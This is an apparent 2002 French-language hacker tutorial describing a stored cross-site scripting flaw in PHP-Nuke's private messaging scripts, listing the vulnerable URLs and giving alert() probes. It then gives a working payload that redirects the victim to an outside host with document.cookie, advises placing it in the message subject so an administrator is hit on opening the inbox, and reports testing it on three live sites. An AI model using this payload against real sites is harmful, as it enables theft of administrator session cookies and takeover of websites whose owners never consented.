Failles dans les messageries PHP-Nuke
			*************************************

La faille que j'explique ici est une de celles qui permettent de récuperer le cookie (comme 
celle de la signature, les failles CSS , etc).
Celle-ci ressemble beaucoup à la faille IMessenger mais est + répandue.
Je rapelle que les cookies sont codés en base64, il est donc tres simple de les decrypter.

J'ai trouvé cette faille dans 3 scripts similaires dont voici les urls :

/modules.php?op=modload&name=Messages&file=replypmsg&send=1
/replypmsg.php?send=1 ou /sendpmsg.php
/messages.php?op=Send

Ces 3 scripts permettent d'envoyer et de recevoir des messages via PHPNuke, en local, donc
pas vers l'exterieur mais uniquement entre les membres du site.
Les urls ci-dessus sont + exactement le script à l'option "envoyer".

Si on envois un message dans un site où l'html est "on" et sans cocher
la case "ne pas envoyer en html", avec un contenu du style
<script>alert(document.domain)</script>, une alerte apparait en effet avec le domaine 
sur lequel on se trouve.
Si on fait de même en envoyant le script dans le sujet en remplacant document.domain en 
document.cookie... même résultat avec le cookie.

Il ne reste plus qu'a remplacer le script de l'alerte par un script redirecteur vers une page
php ou autre qui recuperera le cookie administrateur. Par exemple :
<script>window.location="http://www.machin.net/script.php?cookie="+document.cookie</script>
Il est + efficace de le mettre comme sujet, le webmaster n'aura même pas à ouvrir le message,
il sera directement redirigé en ouvrant sa "boite au lettre".

2 autres petites choses sont interessantes dans les scripts de messagerie.
Si on case "ne pas envoyer en html", et qu'on recommence la petite experience avec les alertes,
on peut voir que rien ne change.

Encore plus impressionant. Si le webmaster décide d'empecher l'html dans les messages,
il peut le mettre en mode "Off".
J'ai testé le script redirecteur sur 3 sites avec le html off, cela marchait sans problèmes.
La vulnérabilité semble donc atteindre tout les sites possedant la messagerie, bien que
je n'ai surement pas pu tester toutes les versions.


frog-m@n
leseulfrog@hotmail.com
le mercredi 2 janvier 2002
Greetz : The Wong Family